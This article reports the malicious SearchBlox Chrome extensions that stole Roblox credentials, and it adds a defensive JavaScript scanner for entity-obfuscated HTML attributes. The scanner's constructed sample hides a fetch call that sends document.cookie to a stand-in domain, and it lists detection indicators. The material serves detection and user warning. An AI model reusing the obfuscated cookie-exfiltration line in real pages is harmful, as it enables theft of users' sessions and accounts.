Malicious SearchBlox extension installed by Roblox players

December 6, 2022

SearchBlox is a malicious Chrome extension that over 200,000 Roblox users have installed. Researchers found that it contains a backdoor capable of stealing Roblox user credentials and the assets those users hold on the Roblox trading platform Rolimons.

Based on reports, code in the extension revealed the backdoor, which was introduced either deliberately by the threat actors or through a later compromise of the extension. A separate researcher stated that the copies published on the Chrome Web Store appear to be compromised.

Searching the Chrome Web Store for SearchBlox returns two extensions. Both offer a server-search feature that lets users pick a Roblox server without hassle, and both are backdoored.

The researchers identified both extensions by their Chrome Web Store IDs: the first is blddohgncmehcepnokognejaaahehncd and the second is ccjalhebkdogpobnbdhfpincfeohonni.


The Roblox community was skeptical about the SearchBlox extension.


Some Roblox community members were already suspicious of SearchBlox earlier this week; several of them investigated it and discovered that the SearchBlox installers had been backdoored.

They warned other users who had already installed the extensions to change their account passwords.

Another group of researchers downloaded the Chrome extension for analysis and found that the first extension ID alone already had more than 200,000 installs by Roblox players.

The second extension has far fewer installs: only 959 worldwide.

The backdoor in the first extension lives in a file named content.js; in the second it is in button.js.

Furthermore, the extensions' HTML contained what looked like an ordinary <img> tag, but its content was written as a long string of HTML numeric character references (sequences of “&#” followed by a number). Decoding those references reveals hidden code that sends Roblox user information to an external domain.

The hidden code also looks up the player's account on the Roblox trading platform Rolimons[.]com.
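The obfuscation described above is simple to undo once you know what to look for: a run of `&#NN;` references inside a tag attribute is not how a normal page looks, and decoding it exposes the script. The following is an added example written for this article, not code from the SearchBlox extension or its analysts. It decodes numeric character references, scans markup for attributes that consist of long entity runs, and reports which exfiltration-style indicators the decoded text contains. SAMPLE_HTML and the domain collector.example are constructed for the example; the real payload is not reproduced here.

```javascript
// Added example, not code from the original article or from SearchBlox:
// decode HTML numeric character references (&#NN; and &#xHH;) and flag tag
// attributes whose decoded value looks like script that exfiltrates data.
// SAMPLE_HTML below is constructed for this example.

// Decode every &#decimal; / &#xhex; reference; other text is left as-is.
function decodeNumericEntities(s) {
  return s.replace(/&#([xX][0-9a-fA-F]+|\d+);/g, (_, code) => {
    const cp = /^[xX]/.test(code) ? parseInt(code.slice(1), 16) : parseInt(code, 10);
    return String.fromCodePoint(cp);
  });
}

// Encode a string as decimal references; used only to build the sample.
function encodeAsNumericEntities(s) {
  return Array.from(s, ch => `&#${ch.codePointAt(0)};`).join("");
}

// Eight or more back-to-back references is not how a normal attribute looks.
const ENTITY_RUN = /(?:&#(?:[xX][0-9a-fA-F]+|\d+);){8,}/;

// Substrings in the decoded text that point at a network call or at
// cookie/credential access.
const SUSPICIOUS = [
  "fetch(", "XMLHttpRequest", "navigator.sendBeacon",
  "document.cookie", "http://", "https://", "eval(",
];

// Walk every tag's attributes; report those that are entity-obfuscated,
// with the decoded value and the indicators it contains.
function findEntityObfuscatedAttributes(html) {
  const findings = [];
  const tagRe = /<([A-Za-z][\w-]*)\b([^>]*)>/g;
  const attrRe = /([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/g;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const [, tagName, attrText] = tag;
    let attr;
    while ((attr = attrRe.exec(attrText)) !== null) {
      const [, attrName, dq, sq] = attr;
      const value = dq !== undefined ? dq : sq;
      if (!ENTITY_RUN.test(value)) continue;
      const decoded = decodeNumericEntities(value);
      findings.push({
        tag: tagName,
        attr: attrName,
        decoded,
        indicators: SUSPICIOUS.filter(p => decoded.includes(p)),
      });
    }
  }
  return findings;
}

// Constructed sample: a harmless-looking <img> whose alt attribute hides a fetch()
// to a made-up collector domain.
const HIDDEN_JS =
  'fetch("https://collector.example/log?c=" + encodeURIComponent(document.cookie))';
const SAMPLE_HTML =
  `<div class="banner"><img src="logo.png" alt="${encodeAsNumericEntities(HIDDEN_JS)}"></div>`;

for (const f of findEntityObfuscatedAttributes(SAMPLE_HTML)) {
  console.log(`<${f.tag} ${f.attr}=...> decodes to: ${f.decoded}`);
  console.log(`  indicators: ${f.indicators.join(", ") || "none"}`);
}
```

Run it with `node` on any extracted extension's HTML files (read the file and pass its contents to `findEntityObfuscatedAttributes`). The run-length threshold is the important design choice: a single `&#169;` in a footer is legitimate, whereas dozens of consecutive references in one attribute almost never are, so the scanner keys on the run rather than on the presence of entities at all.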

Anyone who has installed either SearchBlox extension should remove it immediately, clear their browser cookies, and change their Roblox account password.
